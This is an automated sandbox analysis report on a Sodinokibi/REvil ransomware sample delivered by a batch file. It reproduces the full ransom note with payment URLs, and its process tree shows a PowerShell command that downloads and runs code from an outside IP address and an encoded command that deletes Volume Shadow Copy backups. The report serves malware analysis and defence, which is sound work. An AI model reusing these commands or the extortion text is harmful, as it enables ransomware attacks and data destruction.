Analysis

  • max time kernel
    146s
  • resource
    win7v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    YjMJd0LZ.bat

  • Sample

    191216-md9taqrxs2

  • SHA256

    36a5dfd5cdbe533f51c1aa94a69718240e70670d88d90827b7930fb49023a8e8

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/YjMJd0LZ

Extracted

Language
ps1
Source

Extracted

Path

C:\7107r5v5d4-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 7107r5v5d4. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C9F148270743E1EA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/C9F148270743E1EA Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: hfZjWX5COAEFKB/QJtbUrR+PvRhqy6z1OPNnKSYD4eKGtkxer12nogQc8xP/L/eQ ZBepb2X5APGy9cWmKUbz0n9oDQGU0M3+D3cojSAd6z7fINVVCTvYMgU49+zh601M Lx5rT0txxKL4JFBDCOH6/dNhkHeSsJctQh4xG1hCMYjuaFa37z0nfvmXFsMGUOet HYfXs2JlkEEpAlB0ZPRSg0CkpZoYLxwj/1jpNKoL5qRTk5ghXylf1n5iXpVujYcZ 0zV3YRyV8+p/UtrsmOxK/UBHgTbhq7IpgHeLsRIPRLHTKGt0XnYtg6JtrAtaqVE8 dXtFlI/57nnMyZ6dpzQdg+dXUnHOpLPr0jSn5IxJMmsq0NMkFo2fKPTRD8HxOCfr /xcz7uwQfhhV4u3aESOo2s1WhRvESQ35sBlbRPlUdhPp8r2HYb4wwB9kyeYvyA92 1JUfgANtMu7MBn0PzTH83WYLTgmiXJh0xvrcbxPB99509VbwGe/wjM6H1MI1fqFA 56VYqbEY3/I8hZ339JOFAhdHo1fKN83gbPTPvJ3eV2ZGq6ss7MeTgJX4/bAxJr5U AZGdhMUn6RYwv3hX/REoJvaZGmvakgAz/eOkNrhYh7ZPKCqN1JRh+63laB+kqWuJ sGIjkqu63NMsMpRX3E67Zjtr9RjNDzCfuhdE1loiBCoF7bDkz7HgVGcWeiA9SrAX YmruLZ+3egktYR4mRzf3e2r5Dni7soKn0kxNiPAHPZhyvWV7YWmwlSy/TUJGnbIr tquiv5DNMbXJdVGUr4h6tFjZjKZrhuEauOdg/r3EWhBENr7cK2K/Voj2yWWyTxTU 8jWKFV4Qx9I1VCEyZhhsGYaL5XL1vjzcd8V7k0SVgQUsPHrvt6SVO/RJ4oOqijM/ cUzjvTThGyZ5Srao/ik2/sZeC3l3GuWo9svJuf0oSRVbteIRNkIstVQiMewTdOLp Sjefb5SnLmHaXgQm242QkSglc8AwQLz1UvWfK1KFLdhhQlK7rlse5xpBCmESpz1G OPVMSOzwQ02sEy5SmaxJKs1eCIBYeuld9NuNljwMcrRUhIU3Dt8nC8A9QqzX8+at i361ZiVN8NjehxuX0soEyiB7xdSbLecvkr3t9xEta/WORoopfimeE3m08HDzgacC wFcXALkVzG66nGn8z57UeOAr980= Extension name: 7107r5v5d4 -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C9F148270743E1EA

http://decryptor.top/C9F148270743E1EA

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Adds Run entry to start application 2 TTPs 1 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Drops file in Program Files directory 35 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\YjMJd0LZ.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1384
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/YjMJd0LZ');Invoke-TVEPBAWCYWKBZ;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      • Discovering connected drives
      • Drops file in Program Files directory
      PID:1320
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1948
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1908392402-1638536916-27801542-1072352984-484855387-5478566241539925594-1754304342"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1456
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "5025345331680141083-19158288391376973526-4805526921722215271-21176376001281869524"
    1⤵
      PID:1864
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:616

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    • memory/1320-2-0x00000000055E0000-0x00000000055E2000-memory.dmp

      Filesize

      8KB